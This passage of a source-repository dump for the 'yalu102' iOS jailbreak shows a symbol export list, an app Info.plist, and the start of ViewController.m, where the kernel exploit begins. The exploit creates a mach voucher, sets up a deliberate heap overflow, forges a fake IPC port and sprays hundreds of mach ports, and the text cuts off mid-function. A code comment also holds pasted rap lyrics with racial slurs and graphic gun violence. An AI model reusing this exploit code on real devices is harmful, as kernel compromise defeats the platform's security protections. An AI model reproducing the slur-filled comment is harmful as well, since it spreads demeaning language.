_OSKextCopyPersonalitiesOfKexts, 566 | 
_OSKextCopyPlugins, _OSKextCopyResource, _OSKextCopyUUIDForArchitecture, 567 | _OSKextCreate, _OSKextCreateKextsFromMkextData, 568 | _OSKextCreateKextsFromMkextFile, _OSKextCreateKextsFromURL, 569 | _OSKextCreateKextsFromURLs, _OSKextCreateLoadedKextInfo, 570 | _OSKextCreateMkext, _OSKextCreateWithIdentifier, 571 | _OSKextDeclaresExecutable, _OSKextDependenciesAreLoadableInSafeBoot, 572 | _OSKextDependsOnKext, _OSKextFilterRequiredKexts, 573 | _OSKextFindLinkDependencies, _OSKextFlushDependencies, 574 | _OSKextFlushDiagnostics, _OSKextFlushInfoDictionary, 575 | _OSKextFlushLoadInfo, _OSKextGetActualSafeBoot, 576 | _OSKextGetAllKexts, _OSKextGetArchitecture, _OSKextGetCompatibleKextWithIdentifier, 577 | _OSKextGetCompatibleVersion, _OSKextGetIdentifier, 578 | _OSKextGetKextWithIdentifier, _OSKextGetKextWithIdentifierAndVersion, 579 | _OSKextGetKextWithURL, _OSKextGetLoadAddress, _OSKextGetLoadTag, 580 | _OSKextGetLoadedKextWithIdentifier, _OSKextGetLogFilter, 581 | _OSKextGetRecordsDiagnostics, _OSKextGetRunningKernelArchitecture, 582 | _OSKextGetSimulatedSafeBoot, _OSKextGetSystemExtensionsFolderURLs, 583 | _OSKextGetTypeID, _OSKextGetURL, _OSKextGetUsesCaches, 584 | _OSKextGetValueForInfoDictionaryKey, _OSKextGetVersion, 585 | _OSKextHasLogOrDebugFlags, _OSKextIsAuthentic, _OSKextIsCompatibleWithVersion, 586 | _OSKextIsFromMkext, _OSKextIsInterface, _OSKextIsKernelComponent, 587 | _OSKextIsLibrary, _OSKextIsLoadable, _OSKextIsLoadableInSafeBoot, 588 | _OSKextIsLoaded, _OSKextIsLoggingEnabled, _OSKextIsPlugin, 589 | _OSKextIsStarted, _OSKextIsValid, _OSKextLoad, _OSKextLoadWithOptions, 590 | _OSKextLog, _OSKextLogCFString, _OSKextLogDependencyGraph, 591 | _OSKextLogDiagnostics, _OSKextMatchesRequiredFlags, 592 | _OSKextOtherVersionIsLoaded, _OSKextParseVersionCFString, 593 | _OSKextParseVersionString, _OSKextReadLoadedKextInfo, 594 | _OSKextRemoveKextPersonalitiesFromKernel, _OSKextRemovePersonalitiesForIdentifierFromKernel, 595 | _OSKextResolveDependencies, 
_OSKextSendKextPersonalitiesToKernel, 596 | _OSKextSendPersonalitiesOfKextsToKernel, _OSKextSendPersonalitiesToKernel, 597 | _OSKextSetArchitecture, _OSKextSetLoadAddress, _OSKextSetLogFilter, 598 | _OSKextSetLogOutputFunction, _OSKextSetLoggingEnabled, 599 | _OSKextSetRecordsDiagnostics, _OSKextSetSimulatedSafeBoot, 600 | _OSKextSetUsesCaches, _OSKextStart, _OSKextStop, 601 | _OSKextSupportsArchitecture, _OSKextUnload, _OSKextUnloadKextWithIdentifier, 602 | _OSKextVLog, _OSKextVLogCFString, _OSKextValidate, 603 | _OSKextValidateDependencies, _OSKextVersionGetString, 604 | __CFURLCopyAbsolutePath, __IOAVStringAppendIndendationAndFormat, 605 | __IODataQueueEnqueueWithReadCallback, __IODispatchCalloutWithDispatch, 606 | __IOHIDCallbackApplier, __IOHIDCopyServiceIDs, __IOHIDCreateBinaryData, 607 | __IOHIDDeviceGetIOCFPlugInInterface, __IOHIDElementCreateWithElement, 608 | __IOHIDElementCreateWithParentAndData, __IOHIDElementGetCalibrationInfo, 609 | __IOHIDElementGetFlags, __IOHIDElementGetLength, 610 | __IOHIDElementGetValue, __IOHIDElementSetDevice, 611 | __IOHIDElementSetDeviceInterface, __IOHIDElementSetValue, 612 | __IOHIDEventCopyCFTypeContext, __IOHIDEventGetContext, 613 | __IOHIDEventSetCFTypeContext, __IOHIDEventSetContext, 614 | __IOHIDEventSystemAddConnection, __IOHIDEventSystemAddService, 615 | __IOHIDEventSystemAddServiceForConnection, __IOHIDEventSystemClientCopyClientRecords, 616 | __IOHIDEventSystemClientCopyEventForService, __IOHIDEventSystemClientCopyPropertyForService, 617 | __IOHIDEventSystemClientCopyServiceRecords, __IOHIDEventSystemClientDispatchEventFilter, 618 | __IOHIDEventSystemClientDispatchPropertiesChanged, 619 | __IOHIDEventSystemClientRegisterClientRecordsChangedBlock, 620 | __IOHIDEventSystemClientRegisterClientRecordsChangedCallback, 621 | __IOHIDEventSystemClientRegisterServiceRecordsChangedBlock, 622 | __IOHIDEventSystemClientRegisterServiceRecordsChangedCallback, 623 | __IOHIDEventSystemClientServiceConformsTo, 
__IOHIDEventSystemClientSetElementValueForService, 624 | __IOHIDEventSystemClientSetPropertyForService, __IOHIDEventSystemClientUnregisterClientRecordsChangedBlock, 625 | __IOHIDEventSystemClientUnregisterClientRecordsChangedCallback, 626 | __IOHIDEventSystemClientUnregisterServiceRecordsChangedBlock, 627 | __IOHIDEventSystemClientUnregisterServiceRecordsChangedCallback, 628 | __IOHIDEventSystemConnectionAddNotification, __IOHIDEventSystemConnectionAddServices, 629 | __IOHIDEventSystemConnectionContainsEntitlement, 630 | __IOHIDEventSystemConnectionContainsService, __IOHIDEventSystemConnectionCopyQueue, 631 | __IOHIDEventSystemConnectionCopyRecord, __IOHIDEventSystemConnectionCopyServices, 632 | __IOHIDEventSystemConnectionCreate, __IOHIDEventSystemConnectionEventFilterCompare, 633 | __IOHIDEventSystemConnectionFilterEvent, __IOHIDEventSystemConnectionGetEventFilterPriority, 634 | __IOHIDEventSystemConnectionGetExecutablePath, __IOHIDEventSystemConnectionGetPID, 635 | __IOHIDEventSystemConnectionGetPort, __IOHIDEventSystemConnectionGetReplyPort, 636 | __IOHIDEventSystemConnectionGetSystem, __IOHIDEventSystemConnectionPropertyChanged, 637 | __IOHIDEventSystemConnectionQueueStart, __IOHIDEventSystemConnectionQueueStop, 638 | __IOHIDEventSystemConnectionRecordClientChanged, 639 | __IOHIDEventSystemConnectionRecordServiceChanged, 640 | __IOHIDEventSystemConnectionRegisterDemuxCallback, 641 | __IOHIDEventSystemConnectionRegisterEventFilter, 642 | __IOHIDEventSystemConnectionRegisterPropertyChangedNotification, 643 | __IOHIDEventSystemConnectionRegisterRecordClientChanged, 644 | __IOHIDEventSystemConnectionRegisterRecordServiceChanged, 645 | __IOHIDEventSystemConnectionRegisterTerminationCallback, 646 | __IOHIDEventSystemConnectionRemoveAllServices, __IOHIDEventSystemConnectionRemoveNotification, 647 | __IOHIDEventSystemConnectionRemoveService, __IOHIDEventSystemConnectionScheduleAsync, 648 | __IOHIDEventSystemConnectionSetQueue, 
__IOHIDEventSystemConnectionUnregisterEventFilter, 649 | __IOHIDEventSystemConnectionUnregisterPropertyChangedNotification, 650 | __IOHIDEventSystemConnectionUnregisterRecordClientChanged, 651 | __IOHIDEventSystemConnectionUnregisterRecordServiceChanged, 652 | __IOHIDEventSystemConnectionUnscheduleAsync, __IOHIDEventSystemCopyRecord, 653 | __IOHIDEventSystemDispatchEvent, __IOHIDEventSystemGetPropertyForConnection, 654 | __IOHIDEventSystemPropertyChanged, __IOHIDEventSystemRegisterEventFilter, 655 | __IOHIDEventSystemRegisterRecordClientChanged, __IOHIDEventSystemRegisterRecordServiceChanged, 656 | __IOHIDEventSystemRemoveConnection, __IOHIDEventSystemRemoveService, 657 | __IOHIDEventSystemRemoveServicesForConnection, __IOHIDEventSystemSetPropertyForConnection, 658 | __IOHIDEventSystemUnregisterEventFilter, __IOHIDEventSystemUnregisterRecordClientChanged, 659 | __IOHIDEventSystemUnregisterRecordServiceChanged, 660 | __IOHIDHasEntitlement, __IOHIDLoadBundles, __IOHIDLog, 661 | __IOHIDQueueCopyElements, __IOHIDSerialize, __IOHIDServiceAddConnection, 662 | __IOHIDServiceClientCreate, __IOHIDServiceClientDispatchServiceRemoval, 663 | __IOHIDServiceClientRefresh, __IOHIDServiceClose, 664 | __IOHIDServiceContainsReportInterval, __IOHIDServiceContainsReportIntervalForClient, 665 | __IOHIDServiceCopyConnections, __IOHIDServiceCopyDebugDescriptionForClient, 666 | __IOHIDServiceCopyDispatchQueue, __IOHIDServiceCopyPropertyForClient, 667 | __IOHIDServiceCopyRecordForClient, __IOHIDServiceCreate, 668 | __IOHIDServiceCreateVirtual, __IOHIDServiceGetEventDeadlineForClient, 669 | __IOHIDServiceGetOwner, __IOHIDServiceGetReportInterval, 670 | __IOHIDServiceGetReportIntervalForClient, __IOHIDServiceIsInactive, 671 | __IOHIDServiceOpen, __IOHIDServiceRemoveConnection, 672 | __IOHIDServiceRemovePropertiesForClient, __IOHIDServiceScheduleAsync, 673 | __IOHIDServiceSetBatchIntervalForClient, __IOHIDServiceSetEventCallback, 674 | __IOHIDServiceSetEventDeadlineForClient, 
__IOHIDServiceSetPropertyForClient, 675 | __IOHIDServiceSetReportIntervalForClient, __IOHIDServiceUnscheduleAsync, 676 | __IOHIDSessionDispatchEvent, __IOHIDSessionGetPropertyForClient, 677 | __IOHIDSessionSetPropertyForClient, __IOHIDStringAppendIndendationAndFormat, 678 | __IOHIDUnserializeAndVMDealloc, __IOHIDUnserializeAndVMDeallocWithTypeID, 679 | __IOHIDValueCopyToElementValuePtr, __IOHIDValueCreateWithElementValuePtr, 680 | __IOHIDValueCreateWithStruct, __IOObjectCFRelease, 681 | __IOObjectCFRetain, __IOObjectConformsTo, __IOObjectCopyClass, 682 | __IOObjectGetClass, __IOReadBytesFromFile, __IOServiceGetAuthorizationID, 683 | __IOServiceSetAuthorizationID, __IOUSBDeviceDescriptionGetInfo, 684 | __IOWriteBytesToFile, __OSKextCopyKernelRequests, 685 | __OSKextCreateFolderForCacheURL, __OSKextReadCache, 686 | __OSKextReadFromIdentifierCacheForFolder, __OSKextSendResource, 687 | __OSKextSetStrictRecordingByLastOpened, __OSKextWriteCache, 688 | __OSKextWriteIdentifierCacheForKextsInDirectory, 689 | ___CachedPropertiesRefreshApplierFunction, ___ConnectionFunctionPickBatchInterval, 690 | ___GDBIOHIDEventSystemDump, ___IOHIDApplyPropertiesToDeviceFromDictionary, 691 | ___IOHIDApplyPropertyToDeviceSet, ___IOHIDDeviceGetRootKey, 692 | ___IOHIDDeviceGetUUIDKey, ___IOHIDDeviceGetUUIDString, 693 | ___IOHIDDeviceLoadProperties, ___IOHIDDeviceSaveProperties, 694 | ___IOHIDElementGetRootKey, ___IOHIDElementLoadProperties, 695 | ___IOHIDElementRegister, ___IOHIDElementSaveProperties, 696 | ___IOHIDEventSystemClientRefresh, ___IOHIDEventSystemClientRefreshServiceCallback, 697 | ___IOHIDEventSystemClientServiceReplaceCallback, 698 | ___IOHIDEventSystem_debug, ___IOHIDLoadElementSet, 699 | ___IOHIDManagerGetRootKey, ___IOHIDManagerLoadProperties, 700 | ___IOHIDManagerRegister, ___IOHIDManagerSaveProperties, 701 | ___IOHIDNotificationRegister, ___IOHIDPropertyLoadDictionaryFromKey, 702 | ___IOHIDPropertyLoadFromKeyWithSpecialKeys, ___IOHIDPropertySaveToKeyWithSpecialKeys, 703 | 
___IOHIDPropertySaveWithContext, ___IOHIDQueueRegister, 704 | ___IOHIDSaveDeviceSet, ___IOHIDSaveElementSet, ___IOHIDServicePickBatchInterval, 705 | ___IOHIDSession, ___IOHIDSessionRef, ___IOHIDTransactionRegister, 706 | ___IOHIDValueRegister, ___IOUSBDeviceDescriptionRegister, 707 | ___OSKextBundleIDCompare, ___OSKextCacheNeedsUpdate, 708 | ___OSKextCheckURL, ___OSKextClearHasAllDependenciesOnKext, 709 | ___OSKextCompareIdentifiers, ___OSKextCopyExecutableRelativePath, 710 | ___OSKextCreateCacheFileURL, ___OSKextCreateCompositeKey, 711 | ___OSKextCreateFromIdentifierCacheDict, ___OSKextCreateIdentifierCacheDict, 712 | ___OSKextCreateKextRequest, ___OSKextDeallocateMmapBuffer, 713 | ___OSKextGetBleedthroughFlag, ___OSKextLogDependencyGraphApplierFunction, 714 | ___OSKextLogKernelMessages, ___OSKextMapExecutable, 715 | ___OSKextProcessKextRequestResults, ___OSKextReadRegistryNumberProperty, 716 | ___OSKextRealize, ___OSKextRealizeKextsWithIdentifier, 717 | ___OSKextRemoveIdentifierCacheForKext, ___OSKextRemovePersonalities, 718 | ___OSKextSendKextRequest, ___OSKextSetLoadAddress, 719 | ___OSKextStatURL, ___OSKextStatURLsOrURL, ___OSKextURLIsSystemFolder, 720 | ___OSKextUUIDCallback, ___OSKextUnload, ___SetNumPropertyForService, 721 | ___absPathOnVolume, ___kOSKextDiagnosticsFlagAllImplemented, 722 | ___sOSKextDefaultLogFunction, ___sOSKextLogOutputFunction, 723 | ___uuid_callback, __io_hideventsystem_clear_service_cache, 724 | __io_hideventsystem_copy_client_records, __io_hideventsystem_copy_event_for_service, 725 | __io_hideventsystem_copy_matching_services, __io_hideventsystem_copy_property, 726 | __io_hideventsystem_copy_property_for_service, __io_hideventsystem_copy_service_records, 727 | __io_hideventsystem_dispatch_event, __io_hideventsystem_open, 728 | __io_hideventsystem_queue_create, __io_hideventsystem_queue_start, 729 | __io_hideventsystem_queue_stop, __io_hideventsystem_register_event_filter, 730 | 
__io_hideventsystem_register_property_changed_notification, 731 | __io_hideventsystem_register_record_client_changed_notification, 732 | __io_hideventsystem_register_record_service_changed_notification, 733 | __io_hideventsystem_release_notification, __io_hideventsystem_service_conforms_to, 734 | __io_hideventsystem_set_element_value_for_service, 735 | __io_hideventsystem_set_properties, __io_hideventsystem_set_properties_for_service, 736 | __io_hideventsystem_unregister_event_filter, __io_hideventsystem_unregister_property_changed_notification, 737 | __io_hideventsystem_unregister_record_client_changed_notification, 738 | __io_hideventsystem_unregister_record_service_changed_notification, 739 | __io_kSCCompAnyRegex, __io_kSCDynamicStoreDomainState, 740 | __iohideventsystem_client_dispatch_client_records_changed, 741 | __iohideventsystem_client_dispatch_event_filter, 742 | __iohideventsystem_client_dispatch_notification_results, 743 | __iohideventsystem_client_dispatch_properties_changed, 744 | __iohideventsystem_client_dispatch_service_records_changed, 745 | __iohideventsystem_client_dispatch_service_removal, 746 | __iohideventsystem_client_subsystem, __iohideventsystem_subsystem, 747 | __isArray, __isDictionary, __isString, __pm_connect, 748 | __pm_disconnect, _createCFStringForData, _createCFStringForPlist_new, 749 | _createUTF8CStringForCFString, _defaultSettings, 750 | _ev_try_lock, _ev_unlock, _fat_iterator_close, _fat_iterator_file_end, 751 | _fat_iterator_file_start, _fat_iterator_find_arch, 752 | _fat_iterator_find_fat_arch, _fat_iterator_find_host_arch, 753 | _fat_iterator_for_data, _fat_iterator_is_iterable, 754 | _fat_iterator_next_arch, _fat_iterator_num_arches, 755 | _fat_iterator_open, _fat_iterator_reset, _gIOCFPlugInInterfaceID, 756 | _gIOKitLibSerializeOptions, _gIOKitLibServerVersion, 757 | _getEffectivePageSize, _hid_dispatch_pthread_root_queue_create, 758 | _hid_dispatch_queue_create, _hid_dispatch_queue_release, 759 | _hid_pthread_attr_init, 
_io_hideventsystem_clear_service_cache, 760 | _io_hideventsystem_copy_client_records, _io_hideventsystem_copy_event_for_service, 761 | _io_hideventsystem_copy_matching_services, _io_hideventsystem_copy_property, 762 | _io_hideventsystem_copy_property_for_service, _io_hideventsystem_copy_service_records, 763 | _io_hideventsystem_dispatch_event, _io_hideventsystem_open, 764 | _io_hideventsystem_queue_create, _io_hideventsystem_queue_start, 765 | _io_hideventsystem_queue_stop, _io_hideventsystem_register_event_filter, 766 | _io_hideventsystem_register_property_changed_notification, 767 | _io_hideventsystem_register_record_client_changed_notification, 768 | _io_hideventsystem_register_record_service_changed_notification, 769 | _io_hideventsystem_release_notification, _io_hideventsystem_service_conforms_to, 770 | _io_hideventsystem_set_element_value_for_service, 771 | _io_hideventsystem_set_properties, _io_hideventsystem_set_properties_for_service, 772 | _io_hideventsystem_unregister_event_filter, _io_hideventsystem_unregister_property_changed_notification, 773 | _io_hideventsystem_unregister_record_client_changed_notification, 774 | _io_hideventsystem_unregister_record_service_changed_notification, 775 | _io_pm_assertion_activity_aggregate, _io_pm_assertion_activity_log, 776 | _io_pm_assertion_copy_details, _io_pm_assertion_create, 777 | _io_pm_assertion_notify, _io_pm_assertion_retain_release, 778 | _io_pm_assertion_set_properties, _io_pm_cancel_repeat_events, 779 | _io_pm_change_sa_assertion_behavior, _io_pm_connection_acknowledge_event, 780 | _io_pm_connection_copy_status, _io_pm_connection_create, 781 | _io_pm_connection_release, _io_pm_connection_schedule_notification, 782 | _io_pm_ctl_assertion_type, _io_pm_declare_network_client_active, 783 | _io_pm_declare_system_active, _io_pm_declare_user_active, 784 | _io_pm_force_active_settings, _io_pm_get_capability_bits, 785 | _io_pm_get_uuid, _io_pm_get_value_int, _io_pm_hid_event_copy_history, 786 | 
_io_pm_hid_event_report_activity, _io_pm_last_wake_time, 787 | _io_pm_schedule_power_event, _io_pm_schedule_repeat_event, 788 | _io_pm_set_active_profile, _io_pm_set_bt_wake_interval, 789 | _io_pm_set_debug_flags, _io_pm_set_dw_linger_interval, 790 | _io_pm_set_sleepservice_wake_time_cap, _io_pm_set_value_int, 791 | _io_ps_copy_chargelog, _io_ps_copy_powersources_info, 792 | _io_ps_new_pspowersource, _io_ps_release_pspowersource, 793 | _io_ps_update_pspowersource, _iohideventsystem_client_dispatch_client_records_changed, 794 | _iohideventsystem_client_dispatch_event_filter, 795 | _iohideventsystem_client_dispatch_notification_results, 796 | _iohideventsystem_client_dispatch_properties_changed, 797 | _iohideventsystem_client_dispatch_service_records_changed, 798 | _iohideventsystem_client_dispatch_service_removal, 799 | _iohideventsystem_client_server, _iohideventsystem_client_server_routine, 800 | _iohideventsystem_server, _iohideventsystem_server_routine, 801 | _iokit_user_client_trap, _isCrossLinking, _kIOEthernetHardwareAddress, 802 | _kIOHIDEventSystemConnectionDispatchFilterWaitTimeoutMS, 803 | _kIOHIDFilterPluginArrayCallBacks, _kIOHIDServerConnectionRootQueue, 804 | _kIOHIDServiceEnumerationRootQueue, _kIOHIDServiceInterruptRootQueue, 805 | _kIOMasterPortDefault, _kIOUserEthernetInterfaceMergeProperties, 806 | _kIOUserEthernetInterfaceRole, _kOSKextDependencyCircularReference, 807 | _kOSKextDependencyCompatibleVersionUndeclared, _kOSKextDependencyInauthentic, 808 | _kOSKextDependencyIndirectDependencyUnresolvable, 809 | _kOSKextDependencyIneligibleInSafeBoot, _kOSKextDependencyInvalid, 810 | _kOSKextDependencyLoadedCompatibleVersionUndeclared, 811 | _kOSKextDependencyLoadedIsIncompatible, _kOSKextDependencyMultipleVersionsDetected, 812 | _kOSKextDependencyNoCompatibleVersion, _kOSKextDependencyRawAndComponentKernel, 813 | _kOSKextDependencyUnavailable, _kOSKextDiagnosticBadPropertyListXMLKey, 814 | _kOSKextDiagnosticBadSystemPropertyKey, 
_kOSKextDiagnosticBundleIdentifierMismatchKey, 815 | _kOSKextDiagnosticBundleVersionMismatchKey, _kOSKextDiagnosticCodelessWithLibrariesKey, 816 | _kOSKextDiagnosticCompatibleVersionLaterThanVersionKey, 817 | _kOSKextDiagnosticDeclaresBothKernelAndKPIDependenciesKey, 818 | _kOSKextDiagnosticDeclaresNoKPIsWarningKey, _kOSKextDiagnosticDeclaresNonKPIDependenciesKey, 819 | _kOSKextDiagnosticDeprecatedPropertyKey, _kOSKextDiagnosticExecutableArchNotFoundKey, 820 | _kOSKextDiagnosticExecutableBadKey, _kOSKextDiagnosticExecutableMissingKey, 821 | _kOSKextDiagnosticFileAccessKey, _kOSKextDiagnosticFileNotFoundKey, 822 | _kOSKextDiagnosticIdentifierOrVersionTooLongKey, 823 | _kOSKextDiagnosticIneligibleInSafeBoot, _kOSKextDiagnosticKernelComponentNotInterfaceKey, 824 | _kOSKextDiagnosticMissingPropertyKey, _kOSKextDiagnosticNoExplicitKernelDependencyKey, 825 | _kOSKextDiagnosticNoFileKey, _kOSKextDiagnosticNonAppleKextDeclaresPrivateKPIDependencyKey, 826 | _kOSKextDiagnosticNonuniqueIOResourcesMatchKey, 827 | _kOSKextDiagnosticNotABundleKey, _kOSKextDiagnosticNotSignedKey, 828 | _kOSKextDiagnosticOwnerPermissionKey, _kOSKextDiagnosticPersonalityHasDifferentBundleIdentifierKey, 829 | _kOSKextDiagnosticPersonalityHasNoBundleIdentifierKey, 830 | _kOSKextDiagnosticPersonalityNamesKextWithNoExecutableKey, 831 | _kOSKextDiagnosticPersonalityNamesNonloadableKextKey, 832 | _kOSKextDiagnosticPersonalityNamesUnknownKextKey, 833 | _kOSKextDiagnosticPropertyIsIllegalTypeKey, _kOSKextDiagnosticPropertyIsIllegalValueKey, 834 | _kOSKextDiagnosticRawKernelDependency, _kOSKextDiagnosticSharedExecutableAndExecutableKey, 835 | _kOSKextDiagnosticSharedExecutableKextMissingKey, 836 | _kOSKextDiagnosticStatFailureKey, _kOSKextDiagnosticSymlinkKey, 837 | _kOSKextDiagnosticTypeWarningKey, _kOSKextDiagnosticURLConversionKey, 838 | _kOSKextDiagnosticsAuthenticationKey, _kOSKextDiagnosticsBootLevelKey, 839 | _kOSKextDiagnosticsDependenciesKey, _kOSKextDiagnosticsDependencyNotOSBundleRequired, 840 | 
_kOSKextDiagnosticsInterfaceDependencyCount, _kOSKextDiagnosticsValidationKey, 841 | _kOSKextDiagnosticsWarningsKey, _kOSKextLoadNotification, 842 | _kOSKextUnloadNotification, _macho_find_dysymtab, 843 | _macho_find_section_numbered, _macho_find_source_version, 844 | _macho_find_symbol, _macho_find_symtab, _macho_find_uuid, 845 | _macho_get_section_by_name, _macho_get_section_by_name_64, 846 | _macho_get_segment_by_name, _macho_get_segment_by_name_64, 847 | _macho_remove_linkedit, _macho_scan_load_commands, 848 | _macho_swap, _macho_trim_linkedit, _macho_unswap, 849 | _previouslySerialized, _printPList_new, _recordObjectInIDRefDictionary, 850 | _roundPageCrossSafe, _roundPageCrossSafeFixedWidth, 851 | _setCrossLinkPageSize, _showPList_new ] 852 | ... 853 | -------------------------------------------------------------------------------- /yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /yalu102/ViewController.h: 
-------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /yalu102/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "offsets.h" 10 | #import "ViewController.h" 11 | #import 12 | #import 13 | #import 14 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 15 | #import 16 | #include 17 | 18 | extern uint64_t procoff; 19 | 20 | typedef struct { 21 | mach_msg_header_t head; 22 | mach_msg_body_t msgh_body; 23 | mach_msg_ool_ports_descriptor_t desc[256]; 24 | char pad[4096]; 25 | } sprz; 26 | 27 | @interface ViewController () 28 | 29 | @end 30 | 31 | @implementation ViewController 32 | 33 | - (void)viewDidLoad { 34 | [super viewDidLoad]; 35 | init_offsets(); 36 | struct utsname u = { 0 }; 37 | uname(&u); 38 | 39 | 40 | if (strstr(u.version, "MarijuanARM")) { 41 | [dope setEnabled:NO]; 42 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 43 | } 44 | 45 | // Do any additional setup after loading the view, typically from a nib. 
46 | } 47 | 48 | typedef natural_t not_natural_t; 49 | 50 | struct not_essers_ipc_object { 51 | not_natural_t io_bits; 52 | not_natural_t io_references; 53 | char io_lock_data[1337]; 54 | /* 55 | 56 | https://www.youtube.com/watch?v=ZADJ8S1qH3U 57 | 58 | 59 | [Intro] 60 | Lets get it 61 | Steve Drive 62 | R.I.P L'A Capone 63 | OTF 64 | These nigga's steady woofing like they want beef, want beef? 65 | You want smoke? You want smoke? Just tell me 66 | 67 | [Hook] 68 | These niggas steady woofing like they want beef, want beef?[You want smoke?] 69 | I can make that happen if you want beef, you want beef?[You want smoke?] 70 | Catch you while you're capping with this semi, semi 71 | Put the semi-automatic to your kidney, kidney 72 | 73 | [Verse 1] 74 | Put the semi-automatic to your kidney, kidney 75 | I'm off the dope I got the pole you talking tough you getting smoked 76 | These nigga's steady woofing like they want beef, but I really know 77 | Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show 78 | I'm off Tu pack saying fuck Jojo[Fuck Jojo] 79 | Talking shit get your life took no joke 80 | I'm with my nigga's and my niggas ain't no joke 81 | And if you got that fucking bag then you getting poked 82 | And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] 83 | Me and Durk finna spaz, and I put that on the guys, it's homicides 84 | Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized 85 | And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] 86 | I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] 87 | I'm getting tree tree[Getting dope], getting top from a bitch named Kiki 88 | 89 | [Chorus] 90 | 91 | [Verse 2] 92 | And if you really want smoke[You want smoke little nigga?] 93 | I will give your ass smoke[Give your ass smoke little nigga?] 
94 | This Glock 9 bitch I tote, and I will put it to your throat 95 | I'm off this Tooka pack and no L'A, I'ma go crazy 96 | You supposed to be my nigga but actin' like a fan that’s crazy 97 | What the fuck wrong with these nigga's, they fugazi 98 | I made this song for the niggas, cause they crazy 99 | Separate me from them niggas[Separate Rondo] 100 | Pull up on your block, with the mops 101 | Then I hit the dip and put him up in case of attempts[Incase a nigga survive] 102 | But we don't make throws, we shoot like Pimp[We shoot to kill] 103 | I got 23[Two three] So i don't fucking speak[I don't speak] 104 | Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] 105 | Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch 106 | 107 | [Chorus] 108 | */ 109 | 110 | }; 111 | 112 | 113 | 114 | #define IO_BITS_ACTIVE 0x80000000 115 | #define IKOT_TASK 2 116 | #define IKOT_IOKIT_CONNECT 29 117 | #define IKOT_CLOCK 25 118 | 119 | char dt[128]; 120 | - (IBAction)yolo:(UIButton*)sender 121 | { 122 | /* 123 | 124 | we out here! 
125 | 126 | */ 127 | 128 | mach_port_t vch = 0; 129 | 130 | mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); 131 | data->content_size = 0; 132 | data->key=MACH_VOUCHER_ATTR_KEY_BANK; 133 | data->command=610; 134 | data->previous_voucher=MACH_PORT_NULL; 135 | 136 | kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); 137 | 138 | assert(lol==0 && vch!=0); 139 | 140 | 141 | unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 142 | unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); 143 | assert(fdata == odata + 0x4000); 144 | memset(odata, 0x42, 0x0); 145 | 146 | 147 | uint64_t rsz = 0x100; // alloc size; 148 | fdata -= rsz + 0x100; // overflow full chunk 149 | 150 | struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 151 | 152 | mlock(fakeport, 0x8000); 153 | 154 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; 155 | fakeport->io_lock_data[12] = 0x11; 156 | 157 | *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; 158 | 159 | 160 | mach_port_t* ports = calloc(800, sizeof(mach_port_t)); 161 | 162 | for (int i = 0; i < 800; i++) { 163 | mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 164 | mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); 165 | } 166 | sprz msg1; 167 | 168 | memset(&msg1, 0, sizeof(sprz)); 169 | sprz msg2; 170 | 171 | memset(&msg2, 0, sizeof(sprz)); 172 | msg1.msgh_body.msgh_descriptor_count = 128; 173 | 174 | msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; 175 | msg1.head.msgh_local_port = MACH_PORT_NULL; 176 | msg1.head.msgh_size = sizeof(msg1)-2048; 177 | 178 | mach_port_t* buffer = calloc(0x1000, 